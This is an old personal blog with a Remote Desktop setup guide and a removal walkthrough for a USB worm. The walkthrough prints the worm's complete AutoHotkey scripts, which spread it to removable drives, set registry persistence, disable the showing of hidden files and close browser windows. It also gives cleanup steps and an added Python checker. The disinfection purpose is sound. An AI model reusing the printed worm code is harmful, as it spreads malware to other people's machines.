Saturday, January 26, 2008

CONNECT TO REMOTE COMPUTER

First, I'm going to assume that you want to connect using Remote Desktop. Using that, when you finally do connect, you'll have access to the remote computer almost as if you were sitting in front of it. The bad news here is that Remote Desktop is a feature of Windows XP Pro, and is not present in XP Home. You'll only be able to access your XP Pro machines using Remote Desktop.

Our first barrier is your place of work. Depending on how they are connected to the internet, you simply may not be able to connect out. Larger corporations often restrict what protocols are allowed to access the internet. Quite often they restrict access to Web surfing and Email. If that's the case where you work, there's little recourse, other than pleading with your IT department to allow the Remote Desktop protocol (on port 3389) to reach the internet.

The next barrier, or at least point of confusion, is your IP address. The easiest scenario is if you have a static IP address at home. That way you'll always know what IP address to connect to. In fact, if you have a static IP, you can even register and assign a domain to it, so that you can access your home network by name - something like myhome.mydomain.com - rather than IP address.

If you have a dynamic IP address, you can still get to your network; you simply need to know what the current IP address is. There are several approaches, but none of them is really elegant. For example, you can call home and ask someone to visit a site such as Plot IP, which will display your IP, and then have them read it to you over the phone. If you have access to a web server's access logs, you can have your computer at home visit a specific web page periodically and retrieve the IP address from the logs. And finally there are tools that you can use to map a domain name - like myhome.mydomain.com - to a dynamic IP. These tools do require that you install software on your computer to detect IP address changes, and when a change occurs, it may take up to 48 hours for the DNS changes to make their way across the internet.
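The access-log approach above, worked through as an added example (not code from the original post): assuming the home PC periodically fetches a beacon URL (here /home-beacon, a constructed path) on a server that writes Apache/nginx "combined" log lines, this pulls the most recent public client address from the log and refuses malformed lines and LAN addresses rather than handing you a bogus address to connect to.

```python
import re
from ipaddress import ip_address, ip_network

# Apache/nginx "combined" format: client IP, identity, user, [timestamp], "request" ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)"')

# LAN ranges that can never be the ISP-assigned address of the home router.
LAN_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12",
                                    "192.168.0.0/16", "127.0.0.0/8")]

def latest_beacon_ip(log_lines, beacon_path="/home-beacon"):
    """Return the client IP of the most recent request for beacon_path, or None.

    Unparseable lines, non-IP client fields and LAN addresses are skipped, so a
    stray or malformed entry cannot hand you a bogus address to connect to.
    The log is assumed to be in chronological order, so the last match wins."""
    latest = None
    for line in log_lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        request = match.group("req").split()          # e.g. GET /home-beacon HTTP/1.1
        if len(request) < 2 or request[1].split("?")[0] != beacon_path:
            continue
        try:
            addr = ip_address(match.group("ip"))
        except ValueError:
            continue
        if any(addr in net for net in LAN_NETS):
            continue   # a private address here means a proxy or misconfiguration
        latest = str(addr)
    return latest

# Constructed sample log lines; 203.0.113.x and 198.51.100.x are documentation ranges.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Jan/2008:08:00:01 +0000] "GET /home-beacon HTTP/1.1" 200 12 "-" "curl/7.15"',
    '198.51.100.20 - - [25/Jan/2008:08:05:11 +0000] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/4.0"',
    'not a log line at all',
    '203.0.113.9 - - [25/Jan/2008:09:00:02 +0000] "GET /home-beacon?t=1 HTTP/1.1" 200 12 "-" "curl/7.15"',
    '192.168.1.2 - - [25/Jan/2008:09:30:00 +0000] "GET /home-beacon HTTP/1.1" 200 12 "-" "curl/7.15"',
]

if __name__ == "__main__":
    print(latest_beacon_ip(SAMPLE_LOG))   # 203.0.113.9
```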

The good news about a dynamic IP is that if your router stays connected continuously, the IP address is actually not likely to change often.

The next barrier is your router. A router acts as a firewall, and prevents most connections coming in from the internet. Most people only connect out, to surf the web, download files or read email, so that's not a problem for them. But connecting from a remote location to your home is a connection coming in from the outside.

The router needs to be configured to forward port 3389 (the Remote Desktop Protocol port) to the computer you want to connect to. Unfortunately exactly how that's done will vary depending on the kind of router you have - you'll have to check the documentation. Note that I said you need to configure it to forward to the computer you want to connect to. You can access only one of your computers directly through your router this way. (There are techniques where you can specify that Remote Desktop listen on ports other than 3389. Then, by using a different such port for each computer and forwarding each through the router to the appropriate computer, you can connect directly to each. That's beyond the scope of this article, and more complex than most folks will want to deal with.) My approach, for what it's worth, is to allow external remote access to only one machine on my network. Once connected to that machine I can, if needed, use Remote Desktop on it to connect to any other machine on my network. It can be a little confusing from a UI perspective, knowing which of the three machines connected in sequence my keystrokes are actually going to, but in practice I don't do it often.

Our final barrier is your IP address on your LAN. Your IP address on the internet, whether static or dynamic, is assigned by your ISP and really identifies only one device: your router. Within your local network, the router then typically assigns local IP addresses to all of your computers. The router then handles making sure that all the data traveling between the computers on your local network and the internet goes to the right computers. Those local IP addresses never leave your network - the internet sees only your router's IP address. So when you configure your router to forward port 3389 to a computer, you need to select one of your local computers, and configure its IP address as the destination for Remote Desktop. Then, when the router receives a Remote Desktop request from the internet, it forwards that request to the computer whose IP address you configured. The "problem" is that your local network is, more than likely, using dynamic IP addresses. That means that the IP addresses that are assigned to each computer could change over time.

If you leave your computers on all the time, the addresses won't change, and you're probably OK configuring the router with the current IP address of the computer you want to access remotely. If it ever changes, you'll need to update your router's port forwarding configuration for port 3389. If that's unacceptable or inconvenient, the only real solution is to configure one of your computers to have a static IP address, and then configure the router to forward to that one as the Remote Desktop target. Depending on your router it can be as easy as:

- Configuring the router to assign IP addresses from one range ... say 192.168.1.100 and up.
- Configuring the TCP/IP properties of one of your machines to be a static IP, and defining it with a value outside that range - say, 192.168.1.2 (normally 192.168.1.1 is reserved for the router itself).

In many cases that's enough. In cases where other machines on your network cannot "see" this one machine, it may be necessary to add an entry to the "hosts" file on all the other machines that defines the static IP address for this one machine:

192.168.1.2 machinename

As you can see, things get fairly complex fairly quickly. There are other solutions, but I've not tried any of them myself so I'm not qualified to comment on their suitability or their ease of setup:

- Commercial solutions such as PC Anywhere, or GoToMyPC.
- VNC (Virtual Network Computing) solutions that operate much like Remote Desktop. RealVNC is one example.
- VPN (Virtual Private Network) solutions that create a virtual connection to your entire local network. In recent years, some types of routers come with VPN support built in.

This blog is written with the help of the books Networking by Ajay Gupta and Ethical Hacking by Ankit Fadia, and also some other blogs.

Mainak Bhattacharya
EE, 2nd Year, GNIT, www.mainakkol.co.nr

Friday, January 25, 2008

REMOVE MUHAHAHA TROJAN


It’s time to KILL the Worm:

I have PE Tools installed on my PC, so I ran it to find out the running processes. I went through all the processes and found that svchost.exe was the one responsible for it. Where PE Tools helped me was that this svchost.exe was running from the location C:\heap41a. So this is where the worm resides; hmm, interesting, now deleting the folder should do our task. But it was not so easy: as soon as I terminated this svchost.exe process from the process list it would start again. So I had to boot my XP in safe mode. Why safe mode? Because in safe mode Windows loads only the minimum required drivers and doesn't load any user processes, so the worm is not started with Windows. Now I searched for the folder C:\heap41a, but it was hidden. I went to Tools > Folder Options, selected "Show all files and folders" and pressed OK. I refreshed C:\ only to find that it still wouldn't show any hidden folders. I went back to Tools > Folder Options and found that the "Show all files and folders" setting had been reset. Now how do I see the contents? What I did was go to Windows Search, in the advanced options tell it to search hidden files and folders, and give svchost.exe as the search keyword. Bang, it found it. So I opened the folder, to find that this file was not alone; the other files in this folder were [offspring], 2.mp3 (which produces the sound), Icon.ico, reproduce.txt (in C language), svchost.exe, driveList.txt, script1.txt and std.txt. Let's see the contents of these text files.

[offspring] - Blank Folder

2.mp3 - A laughing sound

Icon.ico - A blank Icon file

reproduce.txt :: a simple copying program

#notrayicon
#persistent
ArrayCount = 0
Loop, Read,C:\heap41a\driveList.txt
{
ArrayCount += 1
Array%ArrayCount% := A_LoopReadLine
}
dat1=%userprofile%
settimer,reproduce,5000
return

reproduce:

Loop %ArrayCount%
{

element := Array%A_Index%
driveget,data,Type,%element%:\
ifequal,data,Removable
{
driveget,data1,status,%element%:\
ifequal,data1,Ready
{
FileCopydir,C:\heap41a\offspring,%element%:\,1

}

}
}
regread,regdata,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\

CurrentVersion\policies\Explorer\Run,winlogon
ifnotequal,regdata,C:\heap41a\svchost.exe C:\heap41a\std.txt
Regwrite,REG_SZ,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\

CurrentVersion\policies\Explorer\Run,winlogon,C:\heap41a\svchost.exe C:\heap41a\std.txt
return

svchost.exe :: the main culprit

This is the file that is the culprit: the file responsible for all the annoying pop-ups.

script1.txt

#persistent
#notrayicon
settimer,ban,2000
return

ban:
WinGetActiveTitle, ed
ifinstring,ed,orkut
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,youtube
{
winclose %ed%
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ifinstring,ed,Mozilla Firefox
{
winclose %ed%
msgbox,262160,USE INTERNET EXPLORER YOU DOPE,I DNT HATE MOZILLA BUT USE IE `r OR ELSE…,30
return
}
ifwinactive ahk_class IEFrame
{

ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,orkut
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,ORKUT IS BANNED,Orkut is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit1,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit2,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit3,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}
ControlGetText,ed,edit4,ahk_class IEFrame
ifinstring,ed,youtube
{
winclose ahk_class IEFrame
soundplay,C:\heap41a\2.mp3
msgbox,262160,youtube IS BANNED,youtube is banned you fool`,The administrators didnt write this program guess who did??`r`r MUHAHAHA!!,30
return
}

}
return

std.txt

#notrayicon
#singleinstance,ignore
regread,regdata,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\

CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue
ifnotequal,regdata,2
regwrite,REG_DWORD,HKEY_LOCAL_MACHINE,SOFTWARE\Microsoft\Windows\

CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL,checkedvalue,2
Run C:\heap41a\svchost.exe C:\heap41a\script1.txt
Run C:\heap41a\svchost.exe C:\heap41a\reproduce.txt

These files gave away all that this worm does; after reading the scripts I found out that this worm also hates YouTube. The most important information they gave was the registry keys it modified.

These are the keys that were responsible for the hidden folder problem I faced earlier ::

AFFECTED ENTRY (std.txt forces the value to 2 every time it runs) ::

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
CheckedValue (REG_DWORD) = 2

ORIGINAL ENTRY ::

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL
CheckedValue (REG_DWORD) = 1

Now to rectify this go to Start Menu > Run and type regedit. In the Registry Editor browse to this entry ::

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL

and reset the "CheckedValue" entry from 2 back to 1. Now you can change the settings in Folder Options again. Now delete the folder ::

C:\heap41a

and clear all the entries that mention heap41a from this registry key ::

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
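To confirm the cleanup, or to check another XP machine for the same three traces documented above (the C:\heap41a folder, the "winlogon" entry under the policies Run key, and the SHOWALL CheckedValue forced to 2), here is an added checker that is not part of the original post. The decision logic takes plain data so it can be exercised anywhere; the collect_live_state function reads the real registry with Python's winreg module and therefore only works on Windows.

```python
import os
import sys
# Indicators the post documents (registry paths are relative to HKLM).
HEAP_DIR = r"C:\heap41a"
RUN_KEY = r"SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run"
SHOWALL_KEY = (r"SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer"
               r"\Advanced\Folder\Hidden\SHOWALL")

def assess(run_values, showall_checked_value, heap_dir_exists):
    """Return findings. run_values: {value name: data} under the policies Run
    key; showall_checked_value: CheckedValue DWORD or None; heap_dir_exists: bool."""
    findings = []
    if heap_dir_exists:
        findings.append("worm folder present: " + HEAP_DIR)
    for name, data in run_values.items():
        if "heap41a" in str(data).lower():
            findings.append(f"persistence in policies Run key: {name} = {data}")
    if showall_checked_value is not None and showall_checked_value != 1:
        findings.append(f"SHOWALL CheckedValue is {showall_checked_value}, "
                        "expected 1 (hidden-files option has been disabled)")
    return findings

def collect_live_state():
    """Read the real registry and disk state; Windows only (uses winreg)."""
    import winreg
    run_values, checked = {}, None
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, RUN_KEY) as key:
            index = 0
            while True:
                try:
                    name, data, _ = winreg.EnumValue(key, index)
                except OSError:
                    break  # no more values
                run_values[name] = data
                index += 1
    except OSError:
        pass  # key absent: nothing registered there
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, SHOWALL_KEY) as key:
            checked, _ = winreg.QueryValueEx(key, "CheckedValue")
    except OSError:
        pass
    return run_values, checked, os.path.isdir(HEAP_DIR)

if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("run this on the suspect Windows machine")
    for finding in assess(*collect_live_state()):
        print(finding)
```

An empty result from assess means none of the three traces is left; anything else names exactly which one still needs the manual step above.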


Now the virus infection is removed 100%. Before you are done, make sure you format the USB drive so it doesn't infect other systems too.

All the best. Until a tool is out for this worm, you can follow this method to remove w32.USBWorm.


HAPPY REMOVING THE VIRUS :: I'M VERY HAPPY BECAUSE I HAD TO FORMAT 2 TIMES BEFORE I FOUND THIS VIRUS :: MAYBE IT HELPS YOU....

For further assistance you can email me, or visit my website :: www.mainakkol.co.nr

Mainak Bhattacharya
EE, 2nd Yr,
GNIT, Email: mainakkol@gmail.com